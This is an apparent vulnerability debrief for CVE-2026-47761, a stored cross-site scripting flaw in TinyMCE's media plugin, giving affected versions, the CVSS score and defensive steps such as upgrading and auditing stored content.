PatchSiren

PatchSiren cyber security CVE debrief

CVE-2026-47761 tinymce CVE debrief

TinyMCE versions prior to 5.11.1, 7.9.3, and 8.5.1 contain a stored cross-site scripting (XSS) vulnerability in the media plugin. Attackers can inject malicious scripts through crafted data-mce-* attributes, which execute when content is rendered. This affects users with the media plugin enabled. The vulnerability was disclosed on 2026-05-28 and carries a HIGH severity CVSS score of 8.7.

Vendor
tinymce
Product
Unknown
CVSS
HIGH 8.7
CISA KEV
Not listed in stored evidence
Original CVE published
2026-05-28
Original CVE updated
2026-05-28
Advisory published
2026-05-28
Advisory updated
2026-05-28

Who should care

Organizations using TinyMCE with the media plugin enabled, particularly those accepting user-generated content or operating multi-user editorial workflows

Technical summary

The vulnerability exists in TinyMCE's media plugin where insufficient sanitization of data-mce-* attributes allows attacker-controlled JavaScript to persist in stored content. When this content is later rendered, the injected scripts execute in the victim's browser context. The CVSS 3.1 vector CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N reflects network attack vector, low complexity, required user interaction, and changed scope with high impact to confidentiality and integrity.

Defensive priority

HIGH

Recommended defensive actions

  • Upgrade TinyMCE to version 5.11.1, 7.9.3, or 8.5.1 or later depending on your major version branch
  • Review and sanitize any stored content that may contain malicious data-mce-* attributes
  • Verify media plugin usage and consider temporary disablement if patching is delayed
  • Audit application logs for suspicious content submissions prior to patch deployment

Evidence notes

CVE published 2026-05-28; NVD status Analyzed; vendor advisory confirms patch availability; CPE ranges confirm affected versions across 5.x, 6.x-7.x, and 8.x branches

Official resources

2026-05-28T16:16:28.337Z